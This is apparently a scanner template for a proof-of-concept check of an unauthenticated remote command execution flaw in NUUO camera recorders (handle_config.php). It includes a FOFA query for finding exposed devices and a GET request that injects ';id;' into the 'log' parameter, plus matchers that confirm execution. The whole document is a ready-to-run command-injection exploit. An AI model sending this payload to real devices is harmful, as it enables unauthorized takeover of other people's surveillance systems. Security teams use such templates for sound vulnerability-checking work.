## id: VEID-2025-0101
## name: NUUO摄像机handle_config.php远程代码执行漏洞
## author: hack007x
## severity: critical
## tags: veid,rce,veid2025
## description:NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器，NUUO摄像头handle_config.php存在未授权命令执行漏洞，攻击者可以获取服务器权限
## fofa-query: body="www.nuuo.com/eHelpdesk.php"
## verification: true


GET /handle_config.php?log=;id; HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}



#@ condition: and
#@ matcher: status_code == 200
#@ matcher: body matches /root:[^\n]+/





# @VEIL-STAMP: 7459fc3bae31427e8cc27cdce6ed1fdd5be989557b76748e3b77b9282375e2af
